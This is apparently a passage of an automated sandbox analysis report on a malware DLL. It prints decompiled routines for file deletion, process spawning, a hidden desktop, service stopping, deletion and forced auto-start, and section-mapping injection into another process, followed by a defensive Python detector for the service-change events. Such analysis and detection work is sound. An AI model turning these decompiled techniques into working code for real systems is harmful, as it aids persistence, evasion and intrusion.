    • DestroyEnvironmentBlock.USERENV(?,?,00000010,?,00000044,00000000), ref: 6ECA36E4
    • CloseHandle.KERNEL32(00000000,?,00000010,?,00000044,00000000), ref: 6ECA36EA
    Strings
    Similarity
    • API ID: CloseHandleMemory$BlockCreateEnvironmentSleepZero$DestroyEnumerateFreeProcessSessionsUser
    • String ID: $D
    • API String ID: 826248435-1196817373
    • Opcode ID: 823ad4e4e70b7273b33c2a3bf4d8a01c1b41c028d8f53d6a72b5a79040e9f263
    • Instruction ID: c4d61e96fab125f0b4d94506ca1966effaea963acf8373aef4459eb806803b7a
    • Opcode Fuzzy Hash: 823ad4e4e70b7273b33c2a3bf4d8a01c1b41c028d8f53d6a72b5a79040e9f263
    • Instruction Fuzzy Hash: 62215171244302ABD600DBACCC94F9F7BFCAB85748F00490CFB5097280E774E8098BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E6ECA2DF0(intOrPtr _a4, intOrPtr _a8) {
    				char _v512;
    				char _v520;
    				char _v832;
    				struct _WIN32_FIND_DATAA _v840;
    				signed char _t19;
    				CHAR* _t26;
    				intOrPtr _t29;
    				void* _t36;
    				void* _t37;
    				FILETIME* _t40;
    
    				_t29 = _a4;
    				_t37 = 0;
    				wsprintfA( &_v520, "%s%c%s", _t29, 0x2a, _a8);
    				_t40 =  &( &_v840->ftLastWriteTime);
    				_push(0x140);
    				_push( &_v832);
    				L6ECAC2EE();
    				_t36 = FindFirstFileA( &_v520,  &_v840);
    				if(_t36 != 0xffffffff) {
    					do {
    						_t19 = _v840.dwFileAttributes;
    						if((_t19 & 0x00000010) == 0 && _t19 != 0) {
    							wsprintfA( &_v520, "%s%s", _t29,  &(_v840.cFileName));
    							_t40 = _t40 + 0x10;
    							_t26 = DeleteFileA( &_v512);
    							if(_t26 == 0) {
    								MoveFileExA( &_v512, _t26, 4);
    							}
    							_t37 = 1;
    						}
    					} while (FindNextFileA(_t36,  &_v840) != 0);
    					FindClose(_t36);
    					return _t37;
    				} else {
    					return 0;
    				}
    			}

    APIs
    • wsprintfA.USER32 ref: 6ECA2E1E
    • RtlZeroMemory.NTDLL(?,00000140), ref: 6ECA2E2D
    • FindFirstFileA.KERNEL32(?,?,?,00000140), ref: 6ECA2E3F
    • wsprintfA.USER32 ref: 6ECA2E7F
    • DeleteFileA.KERNEL32(?), ref: 6ECA2E8C
    • MoveFileExA.KERNEL32 ref: 6ECA2EA1
    • FindNextFileA.KERNEL32(00000000,?), ref: 6ECA2EB2
    • FindClose.KERNEL32(00000000), ref: 6ECA2EBD
    Strings
    Similarity
    • API ID: File$Find$wsprintf$CloseDeleteFirstMemoryMoveNextZero
    • String ID: %s%c%s$%s%s
    • API String ID: 3499340181-3555087778
    • Opcode ID: fedaf7ded02c7ad8501688494ca49575a939cc5ebd3f25c825afa46db37ccb03
    • Instruction ID: 38a7c299aa2f92d94a49db1898126116de90968455e650c01b8f0474165a9baa
    • Opcode Fuzzy Hash: fedaf7ded02c7ad8501688494ca49575a939cc5ebd3f25c825afa46db37ccb03
    • Instruction Fuzzy Hash: F421C372204305ABD360DAE8DC84EEF77BCEBC9726F400929FF5597140EB35A1048A62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECAB0A0(long* __esi) {
    				long _t27;
    				int _t28;
    				void _t31;
    				long _t34;
    				void* _t36;
    				void* _t37;
    				void* _t40;
    				long _t44;
    				void* _t52;
    				void* _t53;
    				void* _t55;
    				intOrPtr _t57;
    				long* _t58;
    				void* _t60;
    				long* _t62;
    
    				_t58 = __esi;
    				_t62[4] = 0;
    				_t27 = NtQuerySystemInformation(5, 0, 0, _t62);
    				if(_t27 == 0xc0000004) {
    					_t27 =  *_t62;
    					if(_t27 != 0) {
    						_t28 = VirtualAlloc(0, _t27, 0x1000, 4);
    						_t55 = _t28;
    						_t62[3] = _t55;
    						if(_t55 == 0) {
    							L23:
    							return _t28;
    						}
    						if(NtQuerySystemInformation(5, _t55, _t62[1],  &(_t62[1])) < 0 || _t62[1] <= 0) {
    							L22:
    							_t28 = VirtualFree(_t55, _t62[1], 0x8000);
    							goto L23;
    						} else {
    							_t60 = _t55;
    							do {
    								if( *((intOrPtr*)(_t60 + 0x44)) != GetCurrentProcessId()) {
    									L19:
    									_t31 =  *_t60;
    									if(_t31 == 0) {
    										break;
    									}
    									goto L20;
    								}
    								_t40 = 0;
    								if( *((intOrPtr*)(_t60 + 4)) <= 0) {
    									goto L19;
    								}
    								_t8 = _t60 + 0xdc; // 0xdc
    								_t62[4] = _t8;
    								do {
    									_t57 =  *(_t62[4]);
    									if(_t57 == GetCurrentThreadId()) {
    										goto L17;
    									}
    									_t34 =  *_t58;
    									if(_t34 != 0) {
    										_t44 = _t58[1];
    										if(_t58[2] < _t44) {
    											L16:
    											 *((intOrPtr*)( *_t58 + _t58[2] * 4)) = _t57;
    											_t58[2] = _t58[2] + 1;
    											goto L17;
    										}
    										_t52 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    										_t36 = HeapReAlloc(_t52, 0, _t34, _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44 + _t44);
    										if(_t36 == 0) {
    											break;
    										}
    										_t58[1] = _t58[1] + _t58[1];
    										 *_t58 = _t36;
    										goto L16;
    									}
    									_t58[1] = 0x80;
    									_t53 = "ly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    									_t37 = HeapAlloc(_t53, _t34, 0x200);
    									 *_t58 = _t37;
    									if(_t37 == 0) {
    										break;
    									}
    									goto L16;
    									L17:
    									_t62[4] = _t62[4] + 0x40;
    									_t40 = _t40 + 1;
    								} while (_t40 <  *((intOrPtr*)(_t60 + 4)));
    								_t55 = _t62[5];
    								goto L19;
    								L20:
    								_t60 = _t60 + _t31;
    							} while (_t60 != 0);
    							goto L22;
    						}
    					}
    				}
    				return _t27;
    			}

    APIs
    • NtQuerySystemInformation.NTDLL ref: 6ECAB0B5
    • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00000000), ref: 6ECAB0DB
    • NtQuerySystemInformation.NTDLL ref: 6ECAB0FC
    • GetCurrentProcessId.KERNEL32(?,00000000,00000005,00000000,000000FF,000000FF), ref: 6ECAB118
    • GetCurrentThreadId.KERNEL32 ref: 6ECAB146
    • HeapAlloc.KERNEL32(00000000,00000000,00000200), ref: 6ECAB16A
    • HeapReAlloc.KERNEL32(00000000,00000000,00000000,?), ref: 6ECAB191
    • VirtualFree.KERNEL32(00000000,000000FF,00008000,00000005,00000000,000000FF,000000FF), ref: 6ECAB1DB
    Strings
    Similarity
    • API ID: Alloc$CurrentHeapInformationQuerySystemVirtual$FreeProcessThread
    • String ID: @
    • API String ID: 494489134-2766056989
    • Opcode ID: 3af48121ada28f661a5306e579696efc731c0fc18479e8649c97d198fa4e56a4
    • Instruction ID: 89571226c7097776c97f1913f68e3b3c1f455511612d3e357c4e668d38390974
    • Opcode Fuzzy Hash: 3af48121ada28f661a5306e579696efc731c0fc18479e8649c97d198fa4e56a4
    • Instruction Fuzzy Hash: E131197020470AAFE750CF59C995B6B77F9EB85B05F10881CFB9687288E770E901CB51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E6ECA4EF0(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
    				DWORD* _v0;
    				signed int _v4;
    				signed int _v8;
    				CHAR* _v12;
    				struct _STARTUPINFOA _v84;
    				char _v92;
    				void* _v96;
    				void* _v100;
    				signed int _t17;
    				signed int _t23;
    				long _t27;
    				DWORD* _t30;
    				intOrPtr _t33;
    				struct _PROCESS_INFORMATION* _t44;
    
    				_t44 =  &_v84;
    				_push(0x44);
    				_push( &(_v84.dwX));
    				L6ECAC2EE();
    				_push(0x10);
    				_push( &_v92);
    				L6ECAC2EE();
    				_t17 = _v8;
    				_v84.cb = 0x44;
    				if(_t17 == 0) {
    					_v84.dwFlags = 1;
    				}
    				_t33 = _a12;
    				if(_t33 != 0) {
    					_v84.lpDesktop = _t33;
    				}
    				asm("sbb eax, eax");
    				if(CreateProcessA(0, _v12, 0, 0, 0,  ~_t17 & 0x08000000, 0, _a8,  &_v84, _t44) == 0) {
    					return 0;
    				} else {
    					_t23 = _v4;
    					if(_t23 != 0) {
    						if(_t23 == 0xffffffff) {
    							_t27 = _t23 | 0xffffffff;
    						} else {
    							_t27 = _t23 * 0x3e8;
    						}
    						if(WaitForSingleObject(_v100, _t27) != 0) {
    							if(_a4 != 0) {
    								_push(0);
    								_push(_v100);
    								L6ECAC30C();
    							}
    						} else {
    							_t30 = _v0;
    							if(_t30 != 0) {
    								GetExitCodeProcess(_v100, _t30);
    							}
    						}
    					}
    					CloseHandle(_v96);
    					CloseHandle(_v100);
    					return 1;
    				}
    			}
    Instruction addresses of the statement lines in the C code above, in order (0x00000000 where a line has no address of its own): 0x6eca4ef0 0x6eca4ef3 0x6eca4ef9 0x6eca4efa 0x6eca4eff 0x6eca4f05 0x6eca4f06 0x6eca4f0b 0x6eca4f0f 0x6eca4f19 0x6eca4f1b 0x6eca4f1b 0x6eca4f23 0x6eca4f29 0x6eca4f2b 0x6eca4f2b 0x6eca4f41 0x6eca4f5e 0x6eca4fd2 0x6eca4f60 0x6eca4f60 0x6eca4f66 0x6eca4f6b 0x6eca4f75 0x6eca4f6d 0x6eca4f6d 0x6eca4f6d 0x6eca4f85 0x6eca4fa1 0x6eca4fa6 0x6eca4fa8 0x6eca4fa9 0x6eca4fa9 0x6eca4f87 0x6eca4f87 0x6eca4f8d 0x6eca4f94 0x6eca4f94 0x6eca4f8d 0x6eca4f85 0x6eca4fba 0x6eca4fc1 0x6eca4fcc 0x6eca4fcc

    APIs
    • RtlZeroMemory.NTDLL(?,00000044), ref: 6ECA4EFA
    • RtlZeroMemory.NTDLL(00000044,00000010), ref: 6ECA4F06
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,?), ref: 6ECA4F56
    • WaitForSingleObject.KERNEL32(?,?), ref: 6ECA4F7D
    • GetExitCodeProcess.KERNEL32 ref: 6ECA4F94
    • NtTerminateProcess.NTDLL(00000000,00000000), ref: 6ECA4FA9
    • CloseHandle.KERNEL32(00000044), ref: 6ECA4FBA
    • CloseHandle.KERNEL32(00000044), ref: 6ECA4FC1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Process$CloseHandleMemoryZero$CodeCreateExitObjectSingleTerminateWait
    • String ID: D
    • API String ID: 2123967418-2746444292
    • Opcode ID: 5adf518a4f928d979b77ee9d4f40e9589914600757ba32e23648360b87c8ad76
    • Instruction ID: fc54f15835a614944a7050d713a32e29bd9e09351763d05743f5ae8698b0bb20
    • Opcode Fuzzy Hash: 5adf518a4f928d979b77ee9d4f40e9589914600757ba32e23648360b87c8ad76
    • Instruction Fuzzy Hash: 18214C70258302ABE754DBACCD80F5B77E9BB84B05F105A1CBA60CB2C4EB78D805CB52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA9BD0(void* _a4) {
    				struct HDESK__* _t3;
    				struct HDESK__* _t9;
    				void* _t11;
    
    				_t3 = GetThreadDesktop(GetCurrentThreadId());
    				 *0x6ecb0484 = _t3;
    				if(_t3 != 0) {
    					_t3 = CreateDesktopA("TVRF_Instance", 0, 0, 0, 0x10000000, 0);
    					 *0x6ecb0480 = _t3;
    					if(_t3 != 0) {
    						_t11 = CreateThread(0, 0, E6ECA96D0, _a4, 0, 0);
    						if(_t11 != 0) {
    							WaitForSingleObject(_t11, 0xffffffff);
    							CloseHandle(_t11);
    							Sleep(0xfa0);
    						}
    						_t9 =  *0x6ecb0480; // 0x0
    						return CloseDesktop(_t9);
    					}
    				}
    				return _t3;
    			}
    Instruction addresses of the statement lines in the C code above, in order (0x00000000 where a line has no address of its own): 0x6eca9bd7 0x6eca9bdd 0x6eca9be4 0x6eca9bf8 0x6eca9bfe 0x6eca9c05 0x6eca9c20 0x6eca9c24 0x6eca9c29 0x6eca9c30 0x6eca9c3b 0x6eca9c3b 0x6eca9c41 0x00000000 0x6eca9c4e 0x6eca9c05 0x6eca9c4f

    APIs
    • GetCurrentThreadId.KERNEL32 ref: 6ECA9BD0
    • GetThreadDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6ECA9BD7
    • CreateDesktopA.USER32 ref: 6ECA9BF8
    • CreateThread.KERNEL32 ref: 6ECA9C1A
    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?), ref: 6ECA9C29
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 6ECA9C30
    • Sleep.KERNEL32(00000FA0,?,?,?,?,?,?), ref: 6ECA9C3B
    • CloseDesktop.USER32(00000000,?,?,?,?,?,?), ref: 6ECA9C48
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: DesktopThread$CloseCreate$CurrentHandleObjectSingleSleepWait
    • String ID: TVRF_Instance
    • API String ID: 4135746217-3589830093
    • Opcode ID: cc2880ea7588b068f4e484726336e89166b61439a7da4bee952a26d48a4c3f25
    • Instruction ID: b406f85969203869f87cd0f0a316d141b488a3ccb20cf53925e8691a21d3ac9d
    • Opcode Fuzzy Hash: cc2880ea7588b068f4e484726336e89166b61439a7da4bee952a26d48a4c3f25
    • Instruction Fuzzy Hash: 82F0E171241F12BBEA505BA89F1EF5D3E74BB46B5AF100504FF11AB2C4DB70E4009E55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA3700(char* _a4, intOrPtr _a8) {
    				intOrPtr _v24;
    				struct _SERVICE_STATUS _v28;
    				int _v32;
    				char* _t12;
    				void* _t24;
    				void* _t28;
    				void* _t31;
    				int _t32;
    
    				_t32 = 0;
    				_v32 = 0;
    				_t12 = OpenSCManagerA(0, 0, 0xf003f);
    				_t24 = _t12;
    				if(_t24 != 0) {
    					L2:
    					_t28 = OpenServiceA(_t24, _a4, 0xf01ff);
    					if(_t28 == 0) {
    						L13:
    						CloseServiceHandle(_t24);
    						L14:
    						return _t32;
    					}
    					QueryServiceStatus(_t28,  &_v28);
    					if(_v24 == 1) {
    						L9:
    						if(_a8 != 0) {
    							_v32 = DeleteService(_t28);
    						} else {
    							_v32 = 1;
    						}
    						L12:
    						CloseServiceHandle(_t28);
    						_t32 = _v32;
    						goto L13;
    					}
    					if(ControlService(_t28, 1,  &_v28) == 0) {
    						goto L12;
    					}
    					_t31 = 0;
    					while(1) {
    						QueryServiceStatus(_t28,  &_v28);
    						if(_v24 == 1) {
    							goto L9;
    						}
    						Sleep(0x3e8);
    						_t31 = _t31 + 1;
    						if(_t31 < 0x3c) {
    							continue;
    						}
    						goto L12;
    					}
    					goto L9;
    				}
    				_t24 = OpenSCManagerA(_t12, _t12, 1);
    				if(_t24 == 0) {
    					goto L14;
    				}
    				goto L2;
    			}
    Instruction addresses of the statement lines in the C code above, in order (0x00000000 where a line has no address of its own): 0x6eca370c 0x6eca3715 0x6eca3719 0x6eca371b 0x6eca371f 0x6eca3731 0x6eca3743 0x6eca3747 0x6eca37bf 0x6eca37c0 0x6eca37c8 0x6eca37cf 0x6eca37cf 0x6eca374f 0x6eca375a 0x6eca3798 0x6eca379d 0x6eca37b0 0x6eca379f 0x6eca379f 0x6eca379f 0x6eca37b4 0x6eca37b5 0x6eca37bb 0x00000000 0x6eca37bb 0x6eca376c 0x00000000 0x00000000 0x6eca3774 0x6eca3776 0x6eca377c 0x6eca3787 0x00000000 0x00000000 0x6eca378e 0x6eca3790 0x6eca3794 0x00000000 0x00000000 0x00000000 0x6eca3796 0x00000000 0x6eca3776 0x6eca3727 0x6eca372b 0x00000000 0x00000000 0x00000000

    APIs
    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 6ECA3719
    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6ECA3725
    • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 6ECA373D
    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA374F
    • ControlService.ADVAPI32(00000000,00000001,?), ref: 6ECA3764
    • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6ECA377C
    • Sleep.KERNEL32(000003E8), ref: 6ECA378E
    • DeleteService.ADVAPI32(00000000), ref: 6ECA37AA
    • CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37B5
    • CloseServiceHandle.ADVAPI32(00000000), ref: 6ECA37C0
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
    • String ID:
    • API String ID: 3264530519-0
    • Opcode ID: 2001ab13a98bfefc65bb5d4ae9b1990e17be755244a584a1b354ab9eca72e87f
    • Instruction ID: 246206aa663460a152ffc11a8a02abab1ceeb3664a67fd30e72e7400b6b341e0
    • Opcode Fuzzy Hash: 2001ab13a98bfefc65bb5d4ae9b1990e17be755244a584a1b354ab9eca72e87f
    • Instruction Fuzzy Hash: 962184B1104707ABD7409FAD8E9CA7F7FBCEB8A705F00091DFA11D6144EB65D8498B62
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6ECA37D0(int _a4, char** _a8, int _a12) {
    				intOrPtr _v24;
    				struct _SERVICE_STATUS _v28;
    				int _t14;
    				long _t18;
    				int _t26;
    				void* _t31;
    				void* _t33;
    
    				_t31 = _a4;
    				if(_t31 == 0) {
    					return 0;
    				} else {
    					_a4 = 0;
    					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
    						_t18 = _a4;
    						_t26 = _t18;
    						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
    						if(_t33 != 0) {
    							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
    								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
    							}
    							HeapFree(GetProcessHeap(), 0, _t33);
    						}
    					}
    					_t14 = QueryServiceStatus(_t31,  &_v28);
    					if(_v24 != 4 || _t14 == 0) {
    						StartServiceA(_t31, _a12, _a8);
    					}
    					return 1;
    				}
    			}
    Instruction addresses of the statement lines in the C code above, in order: 0x6eca37d4 0x6eca37da 0x6eca3897 0x6eca37e0 0x6eca37f1 0x6eca37fd 0x6eca37ff 0x6eca3808 0x6eca3817 0x6eca381b 0x6eca3829 0x6eca3846 0x6eca3846 0x6eca3856 0x6eca3856 0x6eca385d 0x6eca3864 0x6eca3870 0x6eca3881 0x6eca3881 0x6eca3890 0x6eca3890

    APIs
    • QueryServiceConfigA.ADVAPI32 ref: 6ECA37F9
    • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6ECA380A
    • HeapAlloc.KERNEL32(00000000), ref: 6ECA3811
    • QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6ECA3825
    • ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6ECA3846
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA384F
    • HeapFree.KERNEL32(00000000), ref: 6ECA3856
    • QueryServiceStatus.ADVAPI32(?,?), ref: 6ECA3864
    • StartServiceA.ADVAPI32(?,?,?), ref: 6ECA3881
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
    • String ID:
    • API String ID: 1115209516-0
    • Opcode ID: 4e39f44d124fc4c382f57505a31c14cc63639ba235b8e957cff87c02fba8440b
    • Instruction ID: 0dd0c5ec0a280a7e99a63aa20bda6a5e639d542d06dfe84ca276ad296f58549c
    • Opcode Fuzzy Hash: 4e39f44d124fc4c382f57505a31c14cc63639ba235b8e957cff87c02fba8440b
    • Instruction Fuzzy Hash: DD117F71204702BBE7505AAC8D5DF7F7BBCAB85B68F40461DFA6993184E670D801CB62
    Uniqueness

    Uniqueness Score: -1.00%
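The constants in E6ECA3700 and E6ECA37D0 above are plain Service Control Manager values: OpenSCManagerA is tried with 0xf003f (SC_MANAGER_ALL_ACCESS) and falls back to 1 (SC_MANAGER_CONNECT); OpenServiceA asks for 0xf01ff (SERVICE_ALL_ACCESS); ControlService code 1 is SERVICE_CONTROL_STOP, after which dwCurrentState (offset 4 of SERVICE_STATUS, the `_v24` field) is polled for 1 (SERVICE_STOPPED) up to 0x3c times with Sleep(0x3e8) before DeleteService. E6ECA37D0 reads dwStartType (offset 4 of QUERY_SERVICE_CONFIGA), and if it is not 2 (SERVICE_AUTO_START) rewrites it with ChangeServiceConfigA, passing 0xffffffff (SERVICE_NO_CHANGE) for the other fields, then calls StartServiceA unless dwCurrentState is already 4 (SERVICE_RUNNING). On a host the ChangeServiceConfig half is logged by the Service Control Manager as System event 7040 ("The start type of the X service was changed from ... to ...") and the start as 7036 ("The X service entered the running state"); the stop in E6ECA3700 likewise produces a 7036 "stopped". The following Python is an added detection example, not code from the report or the sample: it pairs those two events per service over constructed log lines in an assumed "<ISO timestamp> <EventID> <message>" layout and flags the ChangeServiceConfig-then-StartService sequence. The log lines, the layout and the function names are mine.

```python
import re
from datetime import datetime, timedelta

# Constructed sample System-log lines ("<ISO time> <EventID> <message>"), with the
# message text modelled on the SCM's 7040 and 7036 events. Only the Remote Registry
# pair reproduces the E6ECA37D0 sequence; the other lines are benign noise.
SAMPLE_LOG = """\
2021-09-09T10:00:00 7036 The Windows Update service entered the running state.
2021-09-09T10:05:01 7040 The start type of the Remote Registry service was changed from disabled to auto start.
2021-09-09T10:05:02 7036 The Remote Registry service entered the running state.
2021-09-09T10:20:00 7040 The start type of the Print Spooler service was changed from auto start to demand start.
2021-09-09T11:00:00 7036 The Print Spooler service entered the stopped state.
"""

RE_7040 = re.compile(r"The start type of the (?P<svc>.+?) service was changed "
                     r"from (?P<old>.+?) to (?P<new>.+?)\.")
RE_7036 = re.compile(r"The (?P<svc>.+?) service entered the (?P<state>\w+) state\.")


def parse(log_text):
    """Turn the assumed log layout into (timestamp, event_id, fields) tuples."""
    events = []
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        ts, eid, msg = parts
        pattern = RE_7040 if eid == "7040" else RE_7036
        match = pattern.match(msg)
        if match:
            events.append((datetime.fromisoformat(ts), int(eid), match.groupdict()))
    return events


def find_autostart_then_start(events, window=timedelta(seconds=60)):
    """Flag a service whose start type becomes 'auto start' (7040) and which then enters
    the running state (7036) within `window`: the ChangeServiceConfigA -> StartServiceA
    order seen in E6ECA37D0. Returns (service, change_time, start_time) tuples."""
    hits = []
    pending = {}                      # service name -> time of the 7040
    for ts, eid, fields in events:
        svc = fields["svc"]
        if eid == 7040 and fields["new"] == "auto start":
            pending[svc] = ts
        elif eid == 7036 and fields["state"] == "running" and svc in pending:
            if ts - pending[svc] <= window:
                hits.append((svc, pending[svc], ts))
            del pending[svc]
    return hits


if __name__ == "__main__":
    for svc, changed, started in find_autostart_then_start(parse(SAMPLE_LOG)):
        print(f"{svc}: set to auto start at {changed}, running at {started}")
```

The 60-second window is an assumption tuned to the sample, which starts the service immediately after reconfiguring it; a real deployment would widen it and join on the service name against installation events as well.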

    C-Code - Quality: 88%
    			E6ECA2640() {
    				char _v8;
    				void* _v16;
    				long _v24;
    				void* _v32;
    				long _v44;
    				void* _v48;
    				void* _v56;
    				void* _v64;
    				long _v80;
    				void* _v88;
    				void* _v92;
    				void* _v120;
    				intOrPtr _v132;
    				void* _v136;
    				void* _v140;
    				void* _t45;
    				void* _t58;
    				intOrPtr _t59;
    
    				_t58 = "embly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    				_t59 =  *((intOrPtr*)(_t58 + 0x3c));
    				_t45 = 0;
    				if( *((intOrPtr*)(_t59 + _t58)) == 0x4550) {
    					_push(8);
    					_push( &_v8);
    					_v24 = 0;
    					L6ECAC2EE();
    					_v16 =  *(_t59 + _t58 + 0x50);
    					if(NtCreateSection( &_v32, 0xe, 0,  &_v16, 0x40, 0x8000000, 0) >= 0) {
    						_v48 = 0;
    						_v44 = 0;
    						if(NtMapViewOfSection(_v56, 0xffffffff,  &_v48, 0, 0, 0,  &_v44, 2, 0, 0x40) >= 0) {
    							_v88 = 0;
    							if(NtMapViewOfSection(_v92, _v64,  &_v88, 0, 0, 0,  &_v80, 2, 0, 0x40) >= 0) {
    								RtlMoveMemory(_v120, _t58,  *(_t59 + _t58 + 0x50));
    								if(E6ECA25B0(_v132, _v136) == 0) {
    									NtUnmapViewOfSection(_v140, _v136);
    								} else {
    									_t45 = _v136;
    								}
    							}
    							NtUnmapViewOfSection(0xffffffff, _v120);
    						}
    						NtClose(_v92);
    					}
    				}
    				return _t45;
    			}
